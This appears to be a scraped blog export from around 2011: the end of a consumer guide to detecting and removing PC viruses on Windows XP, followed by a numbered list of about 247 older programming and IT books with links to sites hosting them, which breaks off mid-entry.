If you're interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you'll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.<br />
<br />
Want another place to look? In Windows XP, click Start, Run, type "services.msc" in the box, and press Enter. You'll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.<br />
<br />
Finally, you can do more detective work by selecting Start, Run, and typing "msconfig" in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.<br />
<br />
If any of these tools won't run--or if your security software won't run--that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.<br />
<br />
What to Do Next<br />
<br />
Once you're fairly sure your system is infected, don't panic. There are steps you can take to assess the damage, depending on your current level of protection.<br />
<br />
* If you don't have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There's McAfee FreeScan, Symantec Security Check, and Trend Micro's HouseCall. If one doesn't find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you're done, buy or download a real antivirus program.<br />
* If you have antivirus software, but it isn't active, get offline, unplug wires-- whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.<br />
* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses--if manual removal is possible--or a free removal tool if it isn't. Check out GriSOFT's Virus Encyclopedia, Eset's Virus Descriptions, McAffee's Virus Glossary, Symantec's Virus Encyclopedia, or Trend Micro's Virus Encyclopedia.<br />
<br />
A Microgram of Prevention<br />
<br />
Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer's security is far more effective than cleaning up the mess afterwards. Start with a good security program, such Trend Micro's PC-Cillin, which you can buy for $50.<br />
<br />
Don't want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).<br />
<br />
Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn't worth your money or your time.<br />
<br />
Speaking of updating, the same goes for Windows. Use Windows Update (it's right there on your Start Menu) to make sure you're getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say "Service Pack 2."<br />
<br />
Here are a few more pointers for a virus-free life:<br />
<br />
* Be careful with e-mail. Set your e-mail software security settings to high. Don't open messages with generic-sounding subjects that don't apply specifically to you from people you don't know. Don't open an attachment unless you're expecting it.<br />
* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.<br />
* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research's Web site and run the free ShieldsUP test to see your ports' status. If some ports show up as closed--or worse yet, open--check your router's documentation to find out how to hide them.Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-68579339219929397922011-03-23T15:33:00.003+07:002011-03-23T15:33:26.819+07:00250+ Tech books online1<br />
10 minute guide to lotus notes mail 4.5<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
2<br />
10 minute guide to Microsoft exchange 5.0<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
3<br />
10 minute guide to outlook 97<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
4<br />
10 minute guide to schedule+ for windows 95<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
5<br />
ActiveX programming unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
6<br />
ActiveX programming unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
7<br />
Advanced perl programming<br />
http://www.hk8.org/old_web/<br />
<br />
8<br />
Advanced PL/SQL programming with packages<br />
http://www.hk8.org/old_web/<br />
<br />
9<br />
Adventure in Prolog/AMZI<br />
www.oopweb.com<br />
<br />
10<br />
Algorithms CMSC251/Mount, David<br />
www.oopweb.com<br />
<br />
11<br />
Alison Balter's Mastering Access 95 development, premier ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
12<br />
Apache : The definitive guide, 3rd.ed.<br />
http://www.hk8.org/old_web/<br />
<br />
13<br />
Beej's guide to network programming/Hall, Brain<br />
www.oopweb.com<br />
<br />
14<br />
Beyond Linux from Scratch/BLFS Development Team<br />
http://book.onairweb.net/computer/os/linux/Administration/Beyond_Linux_From_Scratch/<br />
<br />
15<br />
Borland C++ builder unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
16<br />
Building an intranet with windows NT 4<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
17<br />
Building an Intranet with Windows NT 4<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
18<br />
Building expert systems in prolog/AMZI<br />
www.oopweb.com<br />
<br />
19<br />
C programming language<br />
http://book.onairweb.net/computer/pl/C/The_C_Programming_Language_by_K&R/<br />
<br />
20<br />
C Programming/Holmes, Steven<br />
www.oopweb.com<br />
<br />
21<br />
C++ Annotations<br />
www.oopweb.com<br />
<br />
22<br />
CGI developer's guide<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
23<br />
CGI manual of style<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
24<br />
CGI manual of style online<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
25<br />
CGI programming<br />
http://www.hk8.org/old_web/<br />
<br />
26<br />
CGI programming unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
27<br />
CGI programming with Perl, 2nd.ed.<br />
http://www.hk8.org/old_web/<br />
<br />
28<br />
Charlie Calvert's Borland C++ builder unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
29<br />
Client/server computing, 2nd.ed.<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
30<br />
Client-server computing, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
31<br />
Common LISP, the language/Steele, Guy<br />
www.oopweb.com<br />
<br />
32<br />
Compilers and compiler generators : an introduction with C++/Terry, P.D.<br />
www.oopweb.com<br />
<br />
33<br />
Complete idiot's guide to creating HTML webpage<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
34<br />
Computer graphics CMSC 427/Mount, David<br />
www.oopweb.com<br />
<br />
35<br />
Configuring and troubleshooting the windows NT/95 registry<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
36<br />
Creating commercial websites<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
37<br />
Creating web applets with Java<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
38<br />
Crystal Reports.NET<br />
http://www.crystalreportsbook.com/Chapters.asp<br />
<br />
39<br />
Curious about the internet<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
40<br />
Curious about the internet?<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
41<br />
Dan appleman's developing activeX components with Visual Basic 5<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
42<br />
Dan appleman's developing activex components with Visual Basic 5.0<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
43<br />
Data structures CMSC420/Mount, David<br />
www.oopweb.com<br />
<br />
44<br />
Database developer's guide with visual basic 4, 2nd.ed.<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
45<br />
Database developer's guide with Visual Basic 4, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
46<br />
Database developer's guide with Visual C++ 4, 2nd.ed.<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
47<br />
Database developer's guide with Visual C++ 4, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
48<br />
Design and analysis of computer algorithms CMSC451/Mount, David<br />
www.oopweb.com<br />
<br />
49<br />
Designing implementing Microsoft internet information server<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
50<br />
Designing implementing Microsoft proxy server<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
51<br />
Developing for netscape one<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
52<br />
Developing intranet applications with java<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
53<br />
Developing personal oracle 7 for windows 95 applications<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
54<br />
Developing personal Oracle 7 for windows 95 applications<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
55<br />
Developing professional java applets<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
56<br />
Developing professional java applets<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
57<br />
DNS and BIND<br />
http://www.hk8.org/old_web/<br />
<br />
58<br />
Doing objects with VB.NET and C#<br />
http://vbwire.com/nl?6814<br />
<br />
59<br />
EAI/BPM Evaluation Series: IBM WebSphere MQ Workflow v3.3.2 & EAI Suite by<br />
> Middleware Technology Evaluation Series, Phong Tran & Jeffrey Gosper<br />
http://www.cmis.csiro.au/mte/reports/BPM_IBMwebsphereMQ332.htm<br />
<br />
60<br />
Effective AWK programming<br />
http://book.onairweb.net/computer/os/shell/Effective_AWK_Programming/<br />
<br />
61<br />
Enterprise javabeans, 2nd.ed.<br />
http://www.hk8.org/old_web/<br />
<br />
62<br />
Exploring java<br />
http://www.hk8.org/old_web/<br />
<br />
63<br />
GNOME/Sheets, John<br />
www.oopweb.com<br />
<br />
64<br />
Graph theory/Prof. Even<br />
www.oopweb.com<br />
<br />
65<br />
Hacking java<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
66<br />
How intranets work<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
67<br />
How intranets work<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
68<br />
How to program visual basic 5.0<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
69<br />
How to use HTML 3.2<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
70<br />
Html : The definitive guide<br />
http://www.hk8.org/old_web/<br />
<br />
71<br />
HTML 3.2 & CGI unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
72<br />
HTML 3.2 and CGI professional reference edition unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
73<br />
HTML by example<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
74<br />
Internet firewall<br />
http://www.hk8.org/old_web/<br />
<br />
75<br />
Intranets unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
76<br />
Introduction to object-oriented programming using C++/Muller, Peter<br />
www.oopweb.com<br />
<br />
77<br />
Introduction to programming using Java/Eck, David<br />
www.oopweb.com<br />
<br />
78<br />
Introduction to socket programming<br />
http://book.onairweb.net/computer/network/An_Introduction_to_Socket_Programming/<br />
<br />
79<br />
Java 1.1 unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
80<br />
Java 1.1 unleashed, 2nd.ed.<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
81<br />
Java 1.1 unleashed, 3rd.ed.<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
82<br />
Java 114 documentation<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
83<br />
Java AWT reference<br />
http://www.hk8.org/old_web/<br />
<br />
84<br />
Java by example<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
85<br />
Java developer's guide<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
86<br />
Java developer's guide<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
87<br />
Java developer's reference<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
88<br />
Java developer's reference<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
89<br />
Java Distributed computing<br />
http://www.hk8.org/old_web/<br />
<br />
90<br />
Java enterprise<br />
http://www.hk8.org/old_web/<br />
<br />
91<br />
Java enterprise in a nutshell<br />
http://www.hk8.org/old_web/<br />
<br />
92<br />
Java foundation classes in a nutshell<br />
http://www.hk8.org/old_web/<br />
<br />
93<br />
Java fundamental classes reference<br />
http://www.hk8.org/old_web/<br />
<br />
94<br />
Java in a nutshell<br />
http://www.hk8.org/old_web/<br />
<br />
95<br />
Java in a nutshell, 3rd.ed.<br />
http://www.hk8.org/old_web/<br />
<br />
96<br />
Java language reference<br />
http://www.hk8.org/old_web/<br />
<br />
97<br />
Java security<br />
http://www.hk8.org/old_web/<br />
<br />
98<br />
Java servlet programming<br />
http://www.hk8.org/old_web/<br />
<br />
99<br />
Java unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
100<br />
Java unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
101<br />
Java, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
102<br />
_JavaScript : the definitive guide<br />
http://www.hk8.org/old_web/<br />
<br />
103<br />
_Javascript manual of style<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
104<br />
_Javascript manual of style<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
105<br />
Josh's GNU Linux Guide/Joshua<br />
http://book.onairweb.net/computer/os/linux/Administration/Josh's_GNU_Linux_Guide/<br />
<br />
106<br />
Late night activex<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
107<br />
Late night activeX<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
108<br />
Laura lemay's 3D graphics in and VRML 2<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
109<br />
Laura lemay's activex and _VBScript<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
110<br />
Laura lemay's graphics and web page design<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
111<br />
Laura lemay's guide to sizzling websites design<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
112<br />
Laura lemay's _javascript 1.1<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
113<br />
Laura lemay's web workshop activex and _VBScript<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
114<br />
Laura lemay's web workshop Graphics web page design<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
115<br />
Laura lemay's web workshop _javascript<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
116<br />
Learning perl<br />
http://www.hk8.org/old_web/<br />
<br />
117<br />
Learning perl on win32<br />
http://www.hk8.org/old_web/<br />
<br />
118<br />
Learning the kornshell<br />
http://www.hk8.org/old_web/<br />
<br />
119<br />
Learning unix<br />
http://www.hk8.org/old_web/<br />
<br />
120<br />
Learning vi<br />
http://www.hk8.org/old_web/<br />
<br />
121<br />
Linux from Scratch/Beekmans, Gerard<br />
http://book.onairweb.net/computer/os/linux/Administration/Linux_From_Scratch/<br />
<br />
122<br />
Linux in a nutshell, 3rd.ed.<br />
http://www.hk8.org/old_web/<br />
<br />
123<br />
Linux kernel/Rusling, David<br />
www.oopweb.com<br />
<br />
124<br />
Linux network administrator's guide/Dawson, Terry<br />
www.oopweb.com<br />
<br />
125<br />
Linux system administrator's survival guide<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
126<br />
MAPI, SAPI and TAPI developer's guide<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
127<br />
Mastering access 95 development<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
128<br />
Microsoft access 97 quick reference<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
129<br />
Microsoft access 97 quick reference<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
130<br />
Microsoft backoffice 2 unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
131<br />
Microsoft excel 97 quick reference<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
132<br />
Microsoft excel 97 quick reference<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
133<br />
Microsoft exchange server survival guide<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
134<br />
Microsoft frontpage unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
135<br />
Microsoft word 97 quick reference<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
136<br />
Microsoft word 97 quick reference<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
137<br />
Microsoft works 4.5 6-In-1<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
138<br />
More than 100 full-text e-books<br />
http://www.allfreetech.com/EBookCategory.asp<br />
<br />
139<br />
Ms backoffice administrator's survival guide<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
140<br />
Ms backoffice unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
141<br />
Mysql and msql<br />
http://www.hk8.org/old_web/<br />
<br />
142<br />
Netscape plug-ins developer's kit<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
143<br />
Official gamelan java directory<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
144<br />
Oracle built-in packages<br />
http://www.hk8.org/old_web/<br />
<br />
145<br />
Oracle PL/SQL built-in pocket reference<br />
http://www.hk8.org/old_web/<br />
<br />
146<br />
Oracle PL/SQL language pocket reference<br />
http://www.hk8.org/old_web/<br />
<br />
147<br />
Oracle PL/SQL programming guide to Oracle 8 features<br />
http://www.hk8.org/old_web/<br />
<br />
148<br />
Oracle PL/SQL programming, 2nd.ed.<br />
http://www.hk8.org/old_web/<br />
<br />
149<br />
Oracle unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
150<br />
Oracle unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
151<br />
Oracle web applications PL/SQL developer's introduction<br />
http://www.hk8.org/old_web/<br />
<br />
152<br />
Patterns of enterprise application architecture/Fowler, Martin<br />
http://www.awprofessional.com/catalog/product.asp?product_id={574D77DF-6ED2-BC5-A6A8-02E59CA7482D}<br />
<br />
153<br />
PC week : the intranet advantage<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
154<br />
Perl 5 by example<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
155<br />
Perl 5 quick reference<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
156<br />
Perl 5 unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
157<br />
Perl 5.0 CGI web pages<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
158<br />
Perl cookbook<br />
http://www.hk8.org/old_web/<br />
<br />
159<br />
Perl for system administration<br />
http://www.hk8.org/old_web/<br />
<br />
160<br />
Perl in a nutshell<br />
http://www.hk8.org/old_web/<br />
<br />
161<br />
Perl quick reference<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
162<br />
Peter norton's complete guide to windows NT 4 workstations<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
163<br />
Presenting activex<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
164<br />
Presenting activex<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
165<br />
Presenting javabeans<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
166<br />
Presenting javabeans<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
167<br />
Programming perl<br />
http://www.hk8.org/old_web/<br />
<br />
168<br />
Programming perl, 3rd.ed.<br />
http://www.hk8.org/old_web/<br />
<br />
169<br />
Programming the Perl DBI<br />
http://www.hk8.org/old_web/<br />
<br />
170<br />
Red hat linux unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
171<br />
Running a perfect intranet<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
172<br />
Running Linux, 3rd.ed.<br />
http://www.hk8.org/old_web/<br />
<br />
173<br />
Sams teach yourself java 1.1 in 24 hours/<br />
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Java_1.1_Programming_in_24_Hours<br />
<br />
174<br />
Sams Teach yourself java in 21 days/Lemay, Laura<br />
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Java_in_21_Days/<br />
<br />
175<br />
Sams teach yourself linux in 24 hours/Ball, Bill<br />
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Linux_in_24%20Hours/<br />
<br />
176<br />
Sams teach yourself shell programming in 24 hours<br />
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Shell_Programming_in_24_Hours/<br />
<br />
177<br />
Sams teach yourself TCP/IP in 14 days<br />
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_TCP-IP_in_14_Days(SE)/<br />
<br />
178<br />
Sed and awk<br />
http://www.hk8.org/old_web/<br />
<br />
179<br />
Sendmail<br />
http://www.hk8.org/old_web/<br />
<br />
180<br />
Sendmail desktop reference<br />
http://www.hk8.org/old_web/<br />
<br />
181<br />
Slackware linux unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
182<br />
Special edition using java, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
183<br />
Special edition using _javascript<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
184<br />
Special edition using _javascript<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
185<br />
Special edition using _Jscript<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
186<br />
Special edition using lotus notes and domino 4.5<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
187<br />
Special edition using Microsoft SQL server 6.5, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
188<br />
Special edition using Microsoft visual Interdev<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
189<br />
Special edition using perl 5 for web programming<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
190<br />
Special edition using perl for web programming<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
191<br />
Special edition using Visual Basic 4<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
192<br />
TCP/IP<br />
http://www.hk8.org/old_web/<br />
<br />
193<br />
Teach yourself activex programming in 21 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
194<br />
Teach yourself C++ in 21 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
195<br />
Teach yourself C++ in 21 days<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
196<br />
Teach yourself CGI programming with Perl 5 in a week<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
197<br />
Teach yourself database programming with VB5 in 21 days, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
198<br />
Teach yourself database programming with visual basic 5 in 21 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
199<br />
Teach yourself HTML 3.2 in 24 hours<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
200<br />
Teach yourself HTML 3.2 in 24 hours<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
201<br />
Teach yourself internet game programming with java in 21 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
202<br />
Teach yourself java 1.1 programming in 24 hours<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
203<br />
Teach yourself jave in café in 21 days<br />
http://www.parsian.net/set1252/pages/books.tm<br />
<br />
204<br />
Teach yourself Microsoft visual Interdev in 21 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
205<br />
Teach yourself Microsoft visual Interdev in 21 days<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
206<br />
Teach yourself oracle 8 in 21 days<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
207<br />
Teach yourself perl 5 in 21 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
208<br />
Teach yourself perl 5 in 21 days, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
209<br />
Teach yourself SQL in 21 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
210<br />
Teach yourself SQL in 21 days, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
211<br />
Teach yourself TCP/IP in 14 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
212<br />
Teach yourself TCP/IP in 14 days, 2nd.ed.<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
213<br />
Teach yourself the Internet in 24 hours<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
214<br />
Teach yourself the internet in 24 hours<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
215<br />
Teach yourself _VBScript in 21 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
216<br />
Teach yourself _VBScript in 21 days<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
217<br />
Teach yourself visual basic 5 in 24 hours<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
218<br />
Teach yourself Visual Basic 5 in 24 hours<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
219<br />
Teach yourself Visual J++ in 21 days<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
220<br />
Teach yourself web publishing with HTML 3.2 in 14 days<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
221<br />
Teach yourself web publishing with HTML in 14 days<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
222<br />
Thinking in C++<br />
http://www.mindview.net/Books<br />
<br />
223<br />
Thinking in C++/Eckel, Bruce - Vol.I, 2nd.ed.<br />
www.oopweb.com<br />
<br />
224<br />
Thinking in C++/Eckel, Bruce - Vol.II, 2nd.ed.<br />
www.oopweb.com<br />
<br />
225<br />
Thinking in Enterprise Java<br />
http://www.mindview.net/Books<br />
<br />
226<br />
Thinking in Java, 2nd.ed.<br />
www.oopweb.com<br />
<br />
227<br />
Thinking in Java, 3rd.ed. (pdf)<br />
http://www.mindview.net/Books<br />
<br />
228<br />
Tricks of the internet gurus<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
229<br />
Tricks of the java programming gurus<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
230<br />
Unix and internet security<br />
http://www.hk8.org/old_web/<br />
<br />
231<br />
Unix hints and hacks/Waingrow, Kirk<br />
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Hints_&_Hacks/19270001..htm<br />
<br />
232<br />
Unix in a nutshell<br />
http://www.hk8.org/old_web/<br />
<br />
233<br />
Unix kornshell quick reference<br />
http://book.onairweb.net/computer/os/shell/Unix_KornShell_Quick_Reference/kornShell.html<br />
<br />
234<br />
Unix power tools<br />
http://www.hk8.org/old_web/<br />
<br />
235<br />
Unix shell guide<br />
http://book.onairweb.net/computer/os/shell/The_UNIX_Shell_Guide/<br />
<br />
236<br />
Unix unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
237<br />
Unix unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
238<br />
Unix unleashed Internet Ed./Burk, Robin<br />
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed(Internet_Edition)/fm.htm<br />
<br />
239<br />
Unix unleashed, System administrator's Edition<br />
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed_System_Administrator's_Edition/toc.htm<br />
<br />
240<br />
Unix Unleashed/Sams Publication<br />
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed/<br />
<br />
241<br />
Upgrading PCs illustrated<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
242<br />
Using windows NT workstation 4.0<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
243<br />
_VBScript unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
244<br />
_Vbscript unleashed<br />
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/<br />
<br />
245<br />
Visual basic 4 in 12 easy lessons<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
246<br />
Visual basic 4 unleashed<br />
http://www.parsian.net/set1252/pages/books.htm<br />
<br />
247<br />
Visual Basic 5 night school<br />
